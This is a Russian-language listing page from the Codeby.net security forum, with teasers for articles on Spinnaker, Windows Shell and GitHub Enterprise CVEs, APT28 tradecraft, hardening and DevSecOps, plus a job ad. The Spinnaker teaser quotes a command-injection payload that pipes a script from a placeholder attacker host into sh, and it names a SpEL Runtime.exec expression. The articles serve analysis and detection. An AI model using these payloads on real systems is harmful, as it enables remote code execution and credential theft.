Форум информационной безопасности - Codeby.net
Статья CVE-2026-32604 и CVE-2026-32613: RCE в Spinnaker — от low-priv аутентификации до shell на clouddriver и Echo
CVE-2026-32604 и CVE-2026-32613 в Spinnaker: CVSS 9.9, любая аутентифицированная учётка — shell на clouddriver с production AWS credentials. Один PUT /artifacts/fetch.branch конкатенируется в sh -c без санитизации: «main; curl attacker/sh.sh|sh;» — и clouddriver выполняет произвольный скрипт. GET /artifacts/credentials отдаёт список аккаунтов любому пользователю без проверки ролей. Echo использует SpEL без sandbox — T(java.lang.Runtime).getRuntime().exec() работает напрямую, Orca прикрыли whitelist'ом, Echo — нет.
Post-exploitation: credentials в YAML-конфиге plaintext, IAM-роль через instance metadata, ServiceAccount token → K8s API, trusted mesh к Orca/Fiat/Echo без аутентификации. Два хопа, ноль дополнительных кредов — от low-priv учётки до production-инфраструктуры.
Decision table двух векторов и Falco-правило для детекта shell-spawn из JVM.Вакансия Ведущий специалист по Информационной Безопасности (PCI DSS & Fintech Compliance)
Ведущий специалист по ИБ (PCI DSS & Fintech Compliance) — HaaS, Москва, офис, 300 000–350 000 руб.Ищем эксперта, который возьмёт на себя полный цикл PCI DSS: от подготовки документации и внутренних аудитов до взаимодействия с аудиторами и прохождения ежегодной сертификации. В зоне ответственности — консультирование команд разработки и продукта, участие в запуске новых продуктов, актуализация политик ИБ.
Требуется практический опыт с PCI DSS, знание 152-ФЗ и 821-П. Плюсом: опыт с HSM Thales 10K, понимание архитектуры платёжных систем, финтех или банковский бэкграунд. Официальное трудоустройство по ТК РФ, белая зарплата, 5/2.
CV: @haas_maru в Telegram.Статья Network Policies в Kubernetes: изоляция подов на практике
По умолчанию каждый под в вашем кластере видит все остальные - flat network без границ. Один скомпрометированный контейнер открывает атакующему полный доступ к production-сервисам, базам данных и внутренним API. Именно так выглядит lateral movement в реальных инцидентах.
В этой статье разберём, как Network Policies превращают хаотичную сеть кластера в управляемые сегменты: синтаксис и логику политик, почему стандартный K8s API - это только половина решения, и чем Calico с Cilium закрывают то, что ванильный Kubernetes не умеет. Практический разбор: GlobalNetworkPolicy и DNS-based rules в Calico, L7-фильтрация HTTP-трафика и identity-based security в Cilium, паттерны default deny и микросегментации - с реальными YAML-манифестами и командами для проверки.Статья Харденинг Windows 10/11 после окончания поддержки: чеклист для пентестера и администратора
120 машин на Windows 10 22H2 после EOL — дефолтные GPO, открытый SMBv1, LSASS без RunAsPPL. Mimikatz снимал хеши без сопротивления. Три пентеста, один чеклист.После 14 октября 2025 каждая новая CVE в ядре Windows 10 — перманентный 0-day. Diff между патчем Windows 11 и непропатченной Win10 публикуется открыто — готовый Exploitation for Privilege Escalation T1068. Defender обновляет сигнатуры до 2028, но дыру в win32k.sys антивирусная сигнатура не заткнёт.
Три GPO за 15 минут закрывают 70% типового внутреннего пентеста: RunAsPPL + WDigest off (T1003.001), SMBv1 off (relay, legacy RCE), LLMNR/NBT-NS off (Responder за минуты). Таблица приоритетов из 8 мер: эффект к сложности, закрываемый ATT&CK-вектор для каждой.
HardeningKitty + PingCastle для автоматического аудита по CIS Benchmark v3.0.0.Статья Smoke тестирование и качество обратной связи: от прогона до действия в CI/CD
Smoke-тест поймал сломанный платёжный эндпоинт — но gate пропустил сборку по правилу «pass if >90%». В субботу клиенты не смогли оплатить заказ. Проблема не в тестах, а в feedback loop.Smoke без обратной связи — дымовой датчик с отключённой сиреной. allow_failure: true в GitLab CI превращает gate в декорацию. Уведомление в общий канал из 40 человек — никто не реагирует. Flaky rate выше 2% — команда перестаёт верить gate и начинает его обходить.
Четыре звена feedback loop: детекция → адресная нотификация автору коммита → диагностика с контекстом (Expected 200, got 503) → fix и перезапуск. Pytest + GitLab CI с allow_failure: false, маркеры critical/advisory для двух уровней gate, метрики: pass rate, MTTF, flaky rate, suite duration.
Проверка: уроните smoke намеренно и засеките, когда разработчик узнает.Статья CVE-2026-32202: уязвимость Windows Shell — zero-click кража NTLM-хешей через LNK-файлы
CVE-2026-32202: неполный патч февраля оставил zero-click кражу Net-NTLMv2 через .lnk — открыл папку в Explorer, хеш уже у атакующего. CVSS 4.3, но в домене это lateral movement.Microsoft залатал RCE (CVE-2026-21510, CVSS 8.8), но не тронул механизм аутентификации. Windows Shell резолвит UNC-путь из .lnk ещё до SmartScreen — SMB-хендшейк происходит на этапе path resolution. Responder перехватывает Net-NTLMv2 без единого клика. По документам UI:R, по факту — открытие папки в Explorer.
NTLM relay на Exchange/LDAP/SMB без SMB Signing, offline hashcat -m 5600 — C:L в CVSS не учитывает каскадный эффект. APT28 использовала тот же класс в январской кампании против Украины. CISA KEV, дедлайн 12 мая для федеральных агентств.
Sigma-правило: explorer.exe + outbound TCP 445 вне internal subnet — высокоприоритетный алерт.Статья Утечка данных криптобиржи в России 2026: взлом Grinex на $13,7 млн — разбор TTPs и detection-чеклист для SOC
Взлом Grinex: $13,7 млн за минуты. Преемник Garantex под санкциями США — и те же уязвимости в архитектуре. Kill chain по MITRE ATT&CK и Sigma-правила для SOC на реальных TTPs Q1 2026.Grinex запустился в марте 2026 как замена Garantex после блокировки FinCEN. Архитектура воспроизводилась в спешке — и воспроизвела уязвимости. Атака использовала скомпрометированные API-ключи и инсайдерский доступ к горячим кошелькам. Классический паттерн: privileged credential abuse без аномального детекта.
Разбор TTP: Initial Access через stolen API keys, lateral movement по внутренним сервисам без MFA, вывод через mixer-цепочку. Sigma-правила на аномальные API-запросы и массовый вывод. Чеклист для SOC финтех/крипто-платформ: privileged access audit, аномалии транзакций, мониторинг горячих кошельков.
Маппинг на MITRE ATT&CK и detection checklist.Статья APT28 кампания PRISMEX: анализ цепочки заражения, облачный C2 и detection для SOC
APT28 зарегистрировала WebDAV-домены за 14 дней до патча CVE-2026-21509. 72 часа — 29 писем с реальных госаккаунтов по девяти странам. Эксплойт готов раньше, чем фикс Microsoft.Открыл RTF → Shell.Explorer.2 через OLE инициирует WebDAV → загружается LNK → CVE-2026-21513 обходит MSHTML sandbox → шеллкод. Без макросов. Protected View не спасает. Два варианта после: MiniDoor пересылает входящую почту через SMTP с DeleteAfterSubmit, PRISMEX-цепочка прячет .NET-payload в PNG методом Bit Plane Round Robin и грузит Covenant Grunt через Filen.io.
COM hijacking EhStorShell.dll, scheduled task OneDriveHealth, CLR hosting fileless — модульная архитектура, где компоненты взаимозаменяемы. Октябрь 2025: wiper уничтожил все файлы в %USERPROFILE%.
Sigma-правило, IOC-таблица и маппинг на MITRE ATT&CK.Статья GitHub Enterprise RCE CVE-2026-3854: от реверса закрытых бинарников до полной компрометации сервера
CVE-2026-3854: один git push с semicolon в push option — RCE на GitHub.com и полная компрометация GHES. 40 минут на подтверждение, два часа на патч, 88% инстансов уязвимы.babeld берёт push option без санитизации, вставляет в X-Stat header как есть. Semicolon — делимитер протокола — ломает поле и создаёт новые. Last-write-wins парсинг в gitrpcd: инжектированный rails_env=test перезаписывает production — sandbox отключается. custom_hooks_dir указывает на контролируемую директорию. Произвольные shell-команды от git-пользователя.
Методология Wiz: AI-augmented реверс через IDA MCP ускорил декомпиляцию закрытых бинарников на порядок. Но обнаружение уязвимости — человеческий инсайт: semicolon в shared header это точка инъекции, last-write-wins превращает field injection в override security-полей.
IoC для GHES-администраторов и patch diffing для n-day research.Статья DevSecOps внедрение с нуля: как встроить безопасность в CI/CD и не сломать разработку
DevSecOps без бунта команды: Semgrep сломал релиз на два дня — 40 сообщений в Slack, 180 false positives. Три провала спустя — roadmap, который работает.Shift left — это ещё и про защиту самого пайплайна: PPE (OWASP CICD-SEC-04), T1195.001, T1552.001 — скомпрометированный CI/CD это вектор атаки, а не просто среда сборки. Минимальный стек: Gitleaks на секреты, Semgrep с p/owasp-top-ten и --severity ERROR, Trivy на зависимости и контейнеры, OWASP ZAP на staging.
Главное правило: allow_failure: true на первые четыре недели, ноль blocking-правил на старте. Через месяц тимлид, который сопротивлялся, сам добавляет правила в Semgrep. Убираете эту строку в первый день — получаете обходные пайплайны без сканеров. YAML-конфиги для GitLab CI под каждый инструмент.
Маппинг четырёх векторов на MITRE ATT&CK и четыре ошибки, убивающие DevSecOps практику.